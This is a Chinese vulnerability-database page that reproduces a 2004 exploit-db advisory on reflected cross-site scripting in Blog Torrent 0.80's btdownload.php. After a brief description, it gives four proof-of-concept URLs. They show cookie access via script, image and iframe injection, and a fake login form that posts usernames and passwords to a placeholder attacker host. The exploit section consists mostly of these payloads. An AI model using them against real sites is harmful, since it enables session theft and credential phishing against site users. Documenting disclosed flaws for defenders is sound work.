Blog Torrent 0.80 – ‘BTDownload.php’ Cross-Site Scripting

Blog Torrent 0.80 – ‘BTDownload.php’ Cross-Site Scripting

漏洞ID 1054787 漏洞类型
发布时间 2004-12-07 更新时间 2004-12-07
图片[1]-Blog Torrent 0.80 – ‘BTDownload.php’ Cross-Site Scripting-安全小百科CVE编号 N/A
图片[2]-Blog Torrent 0.80 – ‘BTDownload.php’ Cross-Site Scripting-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24803
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/11839/info

It is reported that Blog Torrent is affected by a cross-site scripting vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied URI input.

This issue could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were to be followed, the hostile code may be rendered in the web browser of the victim user. This would occur in the security context of the affected web site and may allow for theft of cookie-based authentication credentials or other attacks.

Get cookie session:
http://www.example.com/bittorrent_module/btdownload.php?file=<script>alert(document.cookie)</script>

Insert content :
http://www.example.com/bittorrent_module/btdownload.php?file=<img%20src=http://www.google.es/images/logo_sm.gif>

Insert remote web :
http://www.example.com/bittorrent_module/btdownload.php?file=<iframe%20src=http://www.google.es/></iframe>

Insert remote data base:
http://www.example.com/bittorrent_module/btdownload.php?file=<form%20action="http://www.atacker.com/savedb.php"%20method="post">Username:<input%20name="username"%20type="text"%2
0maxlength="30">Password:<input%20name="password"%20type="text"%20maxlength="30"><input%20name="login"%20type="submit"%20value="Login"></form>

相关推荐: Gordano NTMail JUCE Email Filter Weakness

Gordano NTMail JUCE Email Filter Weakness 漏洞ID 1101252 漏洞类型 Failure to Handle Exceptional Conditions 发布时间 2002-11-19 更新时间 2002-11-…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享